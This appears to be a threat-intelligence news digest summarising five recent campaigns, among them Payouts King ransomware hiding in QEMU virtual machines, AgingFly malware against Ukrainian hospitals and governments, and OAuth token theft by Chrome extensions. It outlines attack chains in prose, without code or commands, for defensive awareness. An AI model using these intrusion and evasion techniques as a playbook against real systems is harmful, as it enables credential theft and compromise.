Payouts King ransomware uses hidden QEMU virtual machines to evade endpoint detection
The Payouts King operation used QEMU as a reverse-SSH backdoor to run hidden virtual machines on compromised systems, allowing attackers to execute payloads and maintain covert access outside the visibility of host-based controls. The technique matters because security tools on the host often cannot inspect what runs inside the attacker-created VM.
Research described at least two campaigns, one linked directly to Payouts King and another tied to exploitation of CitrixBleed 2, with QEMU used to collect credentials and support remote access. This shows the virtualization layer is being used not only for stealth, but also for staging and credential operations before the ransomware phase.
The broader security implication is that ransomware operators are shifting from simple encrypt-and-extort behavior toward defense evasion plus covert infrastructure that helps them persist longer and reduce detection before encryption starts. That makes early behavioral detection more important than relying on file-based indicators alone.
New AgingFly malware campaign compromises public sector and health care systems in Ukraine
AgingFly was identified in attacks against local governments and hospitals in Ukraine, with additional forensic indicators suggesting possible targeting of representatives of the Defense Forces. The campaign began with phishing emails disguised as humanitarian aid offers, showing how social engineering is still being paired with custom malware in public-sector operations.
The attack chain used compromised or fake sites to deliver an archive containing an LNK shortcut, which launched an HTA handler, created a scheduled task, and downloaded staged payloads. Researchers said the attackers also used tools for browser credential theft, WhatsApp database decryption, reconnaissance, tunneling and lateral movement.
AgingFly itself provides remote control, command execution, file exfiltration, screenshot capture, keylogging and arbitrary code execution, and dynamically compiles command handlers received from its command-and-control (C2) server. That design gives the operator a smaller initial payload and more flexibility while increasing the difficulty of static analysis.
Trusted signed binaries used to deploy tools that neutralize endpoint security controls
Researchers observed a digitally signed adware tool deploying payloads with SYSTEM privileges that disabled antivirus protections on more than 23,500 hosts across 124 countries in a single day. The affected endpoints included systems in education, utilities, government, and healthcare, which makes the campaign notable for both scale and sector reach.
The operation used signed executables associated with Dragon Boss Solutions LLC and an off-the-shelf update mechanism to deliver MSI and PowerShell-based payloads. The key problem is not just adware distribution, but the fact that the trusted signed software chain was used to deliver defense-evasion tooling that tampered with security products.
The broader implication is that attackers can weaponize software that appears low-risk or merely unwanted into an entry point for privileged security-control disruption, making signed binaries and PUP-style tooling a more serious enterprise concern than many teams assume.
Malicious Chrome extensions abuse trusted store access to steal tokens and session data
Researchers found more than 100 malicious Chrome Web Store extensions attempting to steal Google OAuth2 bearer tokens, establish backdoors and carry out ad fraud. The extensions were published across multiple categories and publisher identities, but analysis tied them to shared command-and-control infrastructure.
The campaign included 108 extensions overall, with reporting describing identity theft, Telegram session theft, ad injection and browser backdoor behavior. Because the extensions lived in the official Chrome Web Store, the threat model is more dangerous than sideloaded malware: users could install them through a channel they normally trust.
The broader implication is that browser extensions are now a mature attack surface for account takeover and data exfiltration. Attackers do not need an endpoint exploit if they can persuade users to install a malicious extension that already has access to browser sessions and web content.
Token theft and session abuse undermine MFA protections in Microsoft 365 attacks
Security researchers reported a targeted campaign using session hijacking and token abuse to compromise Microsoft environments. The attacks focused on high-value users and relied on trusted authentication flows and active sessions rather than traditional credential theft.
A key aspect of the activity was the theft of session cookies or authentication tokens, which allowed attackers to operate inside the environment without reauthenticating. Once a valid session is obtained, MFA and password controls no longer provide effective protection because the session is already trusted by the system.
This represents a post-authentication attack model in which attackers exploit active authenticated sessions rather than credentials, maintain access after password resets and abuse legitimate user context across trusted services and workflows to avoid detection.